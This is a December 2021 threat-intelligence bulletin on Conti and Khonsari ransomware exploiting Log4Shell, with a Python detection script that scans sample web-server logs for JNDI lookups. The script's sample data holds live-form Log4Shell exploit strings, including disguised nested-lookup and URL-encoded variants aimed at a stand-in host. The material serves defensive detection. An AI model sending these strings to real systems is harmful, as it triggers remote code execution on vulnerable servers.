Conti & Log4Shell from AdvIntel

December 21, 2021

Industry: N/A | Level: Tactical | Source: AdvIntel

Continued monitoring of the threat landscape around Log4Shell has identified the Conti ransomware group showing signs of interest. A report from AdvIntel detailed that Conti had been deprived of new viable attack vectors since November and had been searching for new methods. It wasn’t until the fallout of Log4Shell that the ransomware group finally found what it had been looking for. Multiple Conti members have been identified initiating scanning activity for the exploit. A recent quote from AdvIntel confirmed, “the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions.”

  • Anvilogic Scenarios:
    • Log4Shell Payload
    • Kinsing Behaviors
    • Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • File Download (Unix)
    • Modify File Attributes

Khonsari Ransomware & Log4Shell

December 21, 2021

Industry: N/A | Level: Tactical | Source: CadoSecurity

The Khonsari ransomware family has been observed utilizing the CVE-2021-44228/Log4Shell vulnerability to target Windows servers. The malware executable “groenhuyzen.exe” is dropped and exploits the JNDI class. The malware’s functionality is straightforward: at only 12 KB, it enumerates and encrypts (appending the extension .khonsari) all mounted drives with the exception of C:\. Only user directories are encrypted, including Documents, Videos, Pictures, Downloads, and Desktop.

  • Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell

CVE-2021-44228 / Log4Shell Vulnerability

December 10, 2021

Industry: N/A | Level: Tactical | Sources: LunaSec & GitHub-Log4Shell-List

A zero-day exploit has been identified in the Java logging library “log4j” that could result in remote code execution. Affected versions include Log4j 2.0-beta9 through 2.14.1, with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others.

The exploit requires three components: a vulnerable log4j version, any protocol that lets the attacker deliver the exploit string, and a log statement that logs the string from the request.
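Because the exploit string must pass through a logged request, reviewing web-server logs for the JNDI lookup is a natural detection. The following Python is an added example (not from the brief or its sources) that scans constructed access-log lines and first undoes URL encoding and the nested `${lower:…}` / `${…:-…}` lookups used to disguise the token, since a naive `${jndi:` match misses those variants; the log format, addresses and payload strings are assumed and constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumed format; not from the report).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:r}mi://203.0.113.10/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2F203.0.113.10%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10/d}"',
]

# Nested lookups that hide the literal "jndi" token; each is replaced by its result.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}")  # ${lower:j} -> j
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")       # ${::-j}, ${env:X:-j} -> j
_JNDI = re.compile(r"\$\{jndi:([a-z]+):")                      # captures the scheme


def normalize(text: str, max_rounds: int = 10) -> str:
    """Lowercase, URL-decode and collapse nested lookups until the text stops changing."""
    text = text.lower()
    for _ in range(max_rounds):
        prev = text
        text = unquote(text)
        text = _CASE_LOOKUP.sub(r"\1", text)
        text = _DEFAULT_LOOKUP.sub(r"\1", text)
        if text == prev:
            break
    return text


def find_jndi_lookups(lines):
    """Return (line_number, scheme, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        norm = normalize(line)
        match = _JNDI.search(norm)
        if match:
            hits.append((number, match.group(1), norm))
    return hits


if __name__ == "__main__":
    for number, scheme, norm in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {number}: JNDI lookup via {scheme}: {norm}")
```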

Mitigation is available through an update; affected users are recommended to update to log4j version “log4j-2.15.0-rc2”. Threat researchers have identified a variety of threats taking advantage of the widespread vulnerability: Kinsing (a cryptocurrency miner), Mirai malware, Cobalt Strike, a new unidentified ransomware strain, and likely others yet to be identified.